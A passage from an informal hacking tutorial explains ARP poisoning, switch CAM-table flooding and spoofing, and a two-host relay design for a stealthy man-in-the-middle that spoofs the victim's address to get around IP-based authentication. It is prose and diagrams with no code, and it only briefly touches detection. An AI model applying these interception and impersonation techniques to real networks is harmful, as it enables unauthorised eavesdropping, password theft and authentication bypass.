So how can ARP poisoning help us to sniff a system? If we poison their
tables, the packets do not arrive at the destination so there won't be
communication and nothing to sniff! I think you figured it out yourself..
we forward the packets to the real destination. For that we poison the
destination's arp table too... then all communication will go through us,
we will be like a gateway. This is called "Man in the Middle" attack
(MITM).

For MITM we make ourselves a gateway between to hosts using ARP poisoning.
See the scheme:

|--------| |--------| |--------|
| Host A [--------] Switch |-------] Host B |
|--------| |----_---| |--------|
\ | /
\ |----^---| /
\ _ _ _| Hacker |_ _ _/
|--------|

\_ _ = packet route

The hacker poisons the table of Host A to change the entry of Host B to
the address of host `Hacker'. And he poisons the table of Host B to change
the entry of Host A to the address of host `Hacker'. Host `Hacker'
forwards all packets, working like a gateway while sniffing all data. It
is also possible for host `Hacker' to manipulate the data before it
forwards it.

There is a very good tool that uses this method, it's called Ettercap and
you can get it here:
http://ettercap.sourceforge.net/

3.2.4 Detection

It is not that hard to detect the ARP poisoning. A program can monitor the
network for suspicious ARP activity. It is however not easy to protect
against this, if a host supports ARP it should be vulnerable.

3.3 Switch table poisoning

3.3.1 Switch introduction

The ARP poisoning technique was not really an attack against the switch
itself, but some host on the LAN. The technique I'm going to introduce now
is directed at the switch. I have first read about this technique in
phrack magazine issue 57 article 6. From the article a software project
called `taranis' was created and still exists at
http://www.bitland.net/taranis/.

This technique is just as easy as the ARP poisoning technique. To explain
the technique I will first introduce you to how switches work.

A switch is used to connect multiple computers, networks or other
networked devices to one internet. The switch has a port for each
connector where a wire is plugged in. The wire can connect the switch to
another switch or some host's network card.
The switch forwards network packets at the link layer (layer 2). This is
the difference between a switch and a hub. The hub forwards packets at the
physical level, which means that a hub is not intelligently forwarding the
packets to the right port. The switch - working at layer 2 - reads the
MAC addresses of each packet to know where to send the packet to. When the
MAC address is unknown, the packet will be send to all ports. The switch
knows where each host is because it learns this. Say there is a host on
the first port of the switch, when it sends out it's first packet the
switch reads the layer-2 source address and adds it to it's lookup table.
The next time another computer sends out a packet to this address the
switch sends the packet to the first port.
When there are more network addresses on one port, the switch marks the
entry as hub/switch

3.3.2 Switch redirection

Knowing this you could have noticed two possible vulnerabilities:

* what if the table is full (assuming the ammount of entries is not
arbitrary), then the switch might forgot where some of the hosts are
located and send all packets to all ports

* we can probably spoof our source address so that packets destined to
some other host arrive at our system

They both work most of the time, there are some security measures in some
better switch products though. The first method turns the switch into a
hub but may result in DoS because of the load, - not really stealth.
When using this technique we can just flood the LAN with packets with
random sources which causes the switch to behave like a hub, and we can
run a normal sniffer to capture all packets.

The second method is discussed in the phrack article and allows for some
password sniffing. The method is not really useful for man-in-the-middle
attack, only impersonation of our victim's target host.
{
A man-in-the-middle attack requires us to work like a gateway.
But how can we send packets to the host we impersonate when we
have redirected it's traffic at the switch to ourself?
}
The advantage over the ARP method is that this method makes all other
hosts connected to the same switch a victim. That is, the switch where the
attacker is connected to is poisoned, so all connection attempts to the
host the attacker has redirected are redirected to the attacker by the
switch.

3.3.3 Man in the Middle

A man-in-the-middle attack is still possible, although I haven't tested
it. When our victim (10.0.0.2) tries to connect to the redirected host
(10.0.0.1) we can keep the data in a buffer and then reset the switch port
using a broadcasted ARP request destined to 10.0.0.1 of the system we
impersonate. When that system replies, the switch will update it's CAM
table and we can send the data in the buffer to 10.0.0.1, we wait for
response and store it in the buffer, then we re-redirect the traffic of
10.0.0.1 to us again and send the data in the buffer to the victim, and so
on. See the figure below for the illustration of the situation.

10.0.0.1 10.0.0.2
|--------| |----------| |--------|
| target |--------| switch |--------| victim |
|--------| |----------| |--------|
|
|
10.0.0.3
|----------|
| attacker |
|----------|

The method does not seem very reliable, it will atleast be slow and can
result in timeouts. Also, if 10.0.0.1 starts to talk while the victim is
sending data to us the switch may update the table and packets may arrive
at 10.0.0.1 causing 10.0.0.1 to send connection resets and the attacker
must restore the redirection state again etc.
{
Not that connection resets will kill our connection, but then we
must regain the redirection state while 10.0.0.1 is sending
packets.
}
In the phrack article the author(s) mention this idea for
man-in-the-middle attack and they too think it is not very reliable.

However, I think it is possible to make a reliable man-in-the-middle
attack in some cases. I have searched google to see if anyone else has
found a reliable technique to do this but came up with nothing. So here it
goes:

The problem we faced when redirecting traffice to 10.0.0.1 is that we need
to constantly reset/redirect the traffic in the switch. In some scenario's
though, it is possible to make a man-in-the-middle attack without having
to reset the switch, just keep it redirected.
I will illustrate a scenario where we have a victim named `victim' that
wants to connect to a host named `server', here's the drawing:

10.0.0.4
++++++++++++
+ BOX 2 +
++++++_+++++
10.0.0.1 | 10.0.0.2
++++++++++ ++++++^+++++ ++++++++++++ ++++++++++
+ server [----] switch 1 [----] switch 2 [----] victim +
++++++++++ ++++++++++++ ++++++_+++++ ++++++++++
|
++++++^+++++
+ BOX 1 +
++++++++++++
10.0.0.3

[ BOX 1 and 2 are owned by the attacker ]

This illustration looks better huh :>.

Now, I know this situation will not often be there, but say that the
attacker owns BOX 1, connected to switch 2 and he owns BOX 2 connected to
switch 1.
What does this situation help in a man-of-the middle?
Well, it solves our problem. We create a tool that poisons the lookup
table of switch 2 to redirect all traffic destined to host 10.0.0.1
(server) to our BOX 1. BOX 1 has a TCP connection with BOX 2 that runs the
other end of the hacker's program. As soon as victim tries to connect to
server the traffic redirects to BOX 1, BOX 1 sends the data received from
victim over a TCP connection to BOX 2 (along with details of destination
port etc. using a custom protocol). BOX 2 connects to server (10.0.0.1) on
the exact same port that host 10.0.0.2 (victim) wanted to and sends the
data it received from BOX 1 over the connection. BOX 2 receives the reply
from the server (10.0.0.1) and communicates this over to BOX 1 which in
turn communicates it to victim (10.0.0.2).

This may look very complex, but it is not. The only difference between
this situation and the one discussed before is that we now have two
switches and two hosts owned by the attacker. Instead of one gateway we
use two hosts to form one gateway or you could say we have two gateways
now. In this way in this scenario we don't have to reset switch 2 all the
time. The method is quite reliable.

To make the above method more stealth the hacker can also redirect
victim's address (10.0.0.2) to BOX 2 (10.0.0.4) at switch 1 to make a
fully-spoofed connection, the address `10.0.0.2' shows up in the server's
logs and we can circumvent any extra IP-address based authentication.
Isn't that wonderful! This technique is very stealth and probably pretty
reliable and fast.

[+/-] terus diwoco bang...!!!!